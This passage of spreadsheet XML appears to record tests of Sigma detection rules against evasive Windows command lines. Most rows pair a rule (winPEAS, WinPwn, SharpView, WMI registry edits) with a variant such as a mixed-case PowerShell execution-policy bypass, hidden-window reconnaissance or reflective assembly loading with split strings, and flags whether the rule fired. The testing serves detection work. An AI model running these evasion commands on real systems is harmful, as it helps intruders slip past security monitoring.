      <c r="I681" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J681" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K681" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="43" t="n"/>
      <c r="B682" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_sniffing</t>
        </is>
      </c>
      <c r="C682" s="36" t="inlineStr">
        <is>
          <t>Potential Network Sniffing Activity Using Network Tools</t>
        </is>
      </c>
      <c r="D682" s="36" t="inlineStr">
        <is>
          <t>ba1f7802-adc7-48b4-9ecb-81e227fddfd5</t>
        </is>
      </c>
      <c r="E682" s="36" t="inlineStr">
        <is>
          <t>pktmon start --capture --comp nics /"-trace"</t>
        </is>
      </c>
      <c r="F682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G682" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H682" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I682" s="36" t="inlineStr">
        <is>
          <t>PktMon.EXE Execution (f956c7c1-0f60-4bc5-b7d7-b39ab3c08908)</t>
        </is>
      </c>
      <c r="J682" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K682" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B683" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C683" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D683" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E683" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F683" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H683" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I683" s="43" t="n"/>
      <c r="J683" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K683" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B684" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C684" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D684" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E684" s="43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84" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G684" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I684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84" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C685" s="43" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D685" s="43" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E685" s="43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85" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G685" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I685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85" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="36" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B686" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C686" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D686" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E686" s="43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86" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G686" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I686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86" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B687" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C687" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D687" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E687" s="36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687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G687" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H687" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I687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687" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K687" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="43" t="n"/>
      <c r="B688" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C688" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D688" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E688" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F688" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H688" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I688" s="43" t="n"/>
      <c r="J688" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K688" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="43" t="n"/>
      <c r="B689" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C689" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D689" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E689" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H689" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I689" s="43" t="n"/>
      <c r="J689" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K689" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="43" t="n"/>
      <c r="B690" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C690" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D690" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E690" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G690" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H690" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I690" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J690" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K690" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="43" t="n"/>
      <c r="B691" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C691" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D691" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E691" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G691" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H691" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I691" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J691" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K691" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="43" t="n"/>
      <c r="B692" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C692" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D692" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E692" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G692" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H692" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I692" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J692" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K692" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="43" t="n"/>
      <c r="B693" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C693" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D693" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E693" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G693" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H693" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I693" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J693" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K693" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="43" t="n"/>
      <c r="B694" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C694" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D694" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E694" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G694" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H694" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J694" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K694" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B695" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_port_scanner</t>
        </is>
      </c>
      <c r="C695" s="36" t="inlineStr">
        <is>
          <t>PUA - Advanced Port Scanner Execution</t>
        </is>
      </c>
      <c r="D695" s="36" t="inlineStr">
        <is>
          <t>54773c5f-f1cc-4703-9126-2f797d96a69d</t>
        </is>
      </c>
      <c r="E695" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Users\SWACHC~1\AppData\Local\Temp\2\Advanced Port Scanner 2\advanced_port_scanner.exe" /port^able "C:/Users/SwachchhandaP/Downloads/" /lng en_us"</t>
        </is>
      </c>
      <c r="F695" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G695" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H695" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="43" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969); Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969)</t>
        </is>
      </c>
      <c r="J695" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K695" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="43" t="n"/>
      <c r="B696" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C696" s="36" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D696" s="36" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E696" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F696" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G696" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H696" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I696" s="43" t="n"/>
      <c r="J696" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K696" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="43" t="n"/>
      <c r="B697" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C697" s="36" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D697" s="36" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E697" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NOPRoFILE -winDoWSTyLE Hidden -c "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H697" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I697" s="43" t="n"/>
      <c r="J697" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K697" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="43" t="n"/>
      <c r="B698" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C698" s="36" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D698" s="36" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E698" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPRoFIlE -WIndoWstyLe Hidden -c "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F698" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G698" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H698" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I698" s="43" t="n"/>
      <c r="J698" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K698" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="36" t="n"/>
      <c r="B699" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C699" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D699" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E699" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H699" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I699" s="43" t="n"/>
      <c r="J699" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K699" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="36" t="n"/>
      <c r="B700" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C700" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D700" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E700" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H700" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I700" s="43" t="n"/>
      <c r="J700" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K700" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="36" t="n"/>
      <c r="B701" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C701" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D701" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E701" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F701" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G701" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H701" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I701" s="43" t="n"/>
      <c r="J701" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K701" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="36" t="n"/>
      <c r="B702" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C702" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D702" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E702" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H702" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I702" s="43" t="n"/>
      <c r="J702" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K702" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="36" t="n"/>
      <c r="B703" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C703" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D703" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E703" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H703" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I703" s="43" t="n"/>
      <c r="J703" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K703" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="36" t="n"/>
      <c r="B704" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C704" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D704" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E704" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H704" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I704" s="36" t="n"/>
      <c r="J704" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K704" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="36" t="n"/>
      <c r="B705" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C705" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D705" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E705" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H705" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I705" s="43" t="n"/>
      <c r="J705" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K705" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B706" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C706" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D706" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E706" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Notepad.exe</t>
        </is>
      </c>
      <c r="F706" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H706" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I706" s="43" t="n"/>
      <c r="J706" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K706" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B707" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C707" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D707" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E707" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I707" s="43" t="n"/>
      <c r="J707" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K707" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B708" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C708" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D708" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E708" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I708" s="43" t="n"/>
      <c r="J708" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K708" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B709" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C709" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D709" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E709" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
